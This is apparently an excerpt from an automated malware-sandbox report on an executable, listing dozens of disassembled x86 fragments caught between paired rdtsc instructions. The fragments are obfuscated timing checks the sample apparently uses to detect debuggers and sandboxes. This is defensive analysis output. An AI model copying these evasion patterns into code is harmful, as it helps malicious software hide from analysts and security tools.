Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15FF448 second address: 15FF46F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jno 00007F19CD112F74h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15FF46F second address: 15FF473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15FF473 second address: 15FF477 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15FF477 second address: 15FF485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F19CCBA87B6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1645366 second address: 164536C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 164956A second address: 164956E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1648B3C second address: 1648B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1648B40 second address: 1648B49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16490D5 second address: 16490F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CD112F72h 0x00000007 jmp 00007F19CD112F6Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1649296 second address: 164929F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 164929F second address: 16492B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jnp 00007F19CD112F66h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 165185D second address: 1651864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1651864 second address: 1651870 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jp 00007F19CD112F66h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1651870 second address: 1651874 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1651874 second address: 1651885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jc 00007F19CD112F72h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1651885 second address: 165188B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 164F94D second address: 164F981 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a pop esi 0x0000000b pushad 0x0000000c jns 00007F19CD112F79h 0x00000012 jmp 00007F19CD112F73h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F19CD112F6Dh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1650241 second address: 1650245 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16503DD second address: 16503E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16503E3 second address: 16503EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F19CCBA87B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1650543 second address: 1650549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 165069C second address: 16506D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87BDh 0x00000007 jmp 00007F19CCBA87BDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F19CCBA87C6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16506D4 second address: 16506FF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F19CD112F66h 0x00000008 jnl 00007F19CD112F66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 jmp 00007F19CD112F6Bh 0x00000016 push edi 0x00000017 pop edi 0x00000018 pop edx 0x00000019 jno 00007F19CD112F68h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16506FF second address: 1650705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1650705 second address: 1650709 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 164F4BD second address: 164F4CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1658F4B second address: 1658F68 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F19CD112F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F19CD112F73h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1658F68 second address: 1658F83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87C4h 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 165897E second address: 1658989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F19CD112F66h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1658C71 second address: 1658CAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F19CCBA87B6h 0x0000000c jmp 00007F19CCBA87BCh 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007F19CCBA87BEh 0x00000018 jmp 00007F19CCBA87BFh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1665F7D second address: 1665F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1665F83 second address: 1665F9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jmp 00007F19CCBA87C4h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1665CA8 second address: 1665CAD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1668BA2 second address: 1668BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F19CCBA87B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1668BAC second address: 1668BB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16685EE second address: 1668619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 jns 00007F19CCBA87B6h 0x0000000c pop edi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F19CCBA87BEh 0x00000015 jmp 00007F19CCBA87BDh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 166C062 second address: 166C06E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 166D657 second address: 166D663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F19CCBA87B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 166D663 second address: 166D667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 166D667 second address: 166D66D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 166D66D second address: 166D68E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F19CD112F77h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16746BD second address: 16746C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16746C3 second address: 16746E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 jmp 00007F19CD112F78h 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16746E2 second address: 1674702 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F19CCBA87B6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F19CCBA87BCh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007F19CCBA87B6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 167AA5F second address: 167AA63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 167F483 second address: 167F4C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87C9h 0x00000007 jmp 00007F19CCBA87BDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007F19CCBA87BEh 0x00000016 jnl 00007F19CCBA87B6h 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 jnc 00007F19CCBA87B6h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 167F4C7 second address: 167F4E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CD112F77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1681713 second address: 168172F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F19CCBA87C7h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1682DEC second address: 1682E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jnp 00007F19CD112F66h 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop esi 0x0000000f pop eax 0x00000010 jo 00007F19CD112F74h 0x00000016 push esi 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1688FDB second address: 1688FEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F19CCBA87BBh 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1688FEF second address: 1688FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 168915D second address: 1689177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19CCBA87C4h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1689177 second address: 168917B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 168917B second address: 168918B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87BCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16892FA second address: 1689305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1689305 second address: 1689310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1689310 second address: 1689317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 168945E second address: 1689462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1689462 second address: 1689468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1689468 second address: 1689474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1689474 second address: 1689499 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F19CD112F68h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F19CD112F77h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1689499 second address: 168949E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 168949E second address: 16894AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F19CD112F66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1689618 second address: 1689623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1689765 second address: 168976D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1690A9A second address: 1690AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1690AA0 second address: 1690AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F19CD112F66h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16905A0 second address: 16905AA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F19CCBA87B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16905AA second address: 16905D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007F19CD112F6Ch 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F19CD112F72h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16905D8 second address: 16905DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 158770C second address: 1587719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jp 00007F19CD112F66h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 169076E second address: 1690772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1690772 second address: 169077C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 169077C second address: 1690782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1690782 second address: 16907B6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F19CD112F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jo 00007F19CD112F6Eh 0x00000012 js 00007F19CD112F66h 0x00000018 push eax 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e jmp 00007F19CD112F76h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16DF3D7 second address: 16DF3EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F19CCBA87BEh 0x0000000c push eax 0x0000000d pop eax 0x0000000e jl 00007F19CCBA87B6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16DF3EB second address: 16DF41E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F19CD112F66h 0x00000009 jmp 00007F19CD112F6Ch 0x0000000e ja 00007F19CD112F66h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push ebx 0x00000018 jmp 00007F19CD112F72h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 17A4C07 second address: 17A4C13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F19CCBA87B6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 17A4C13 second address: 17A4C44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CD112F78h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jnc 00007F19CD112F90h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jp 00007F19CD112F66h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 17A4C44 second address: 17A4C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F19CCBA87B6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 17A4D96 second address: 17A4D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 17A4D9C second address: 17A4DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 17A4DA0 second address: 17A4DA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 17A4F0D second address: 17A4F13 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 17A5640 second address: 17A5650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jl 00007F19CD112F66h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 17A5650 second address: 17A565A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F19CCBA87BEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 17AA062 second address: 17AA083 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jp 00007F19CD112F66h 0x00000012 jmp 00007F19CD112F6Eh 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 17AA12E second address: 17AA133 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 17ABA00 second address: 17ABA11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jng 00007F19CD112F6Eh 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 17ABA11 second address: 17ABA3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F19CCBA87B8h 0x0000000d pushad 0x0000000e popad 0x0000000f jnc 00007F19CCBA87CAh 0x00000015 jmp 00007F19CCBA87C4h 0x0000001a rdtsc
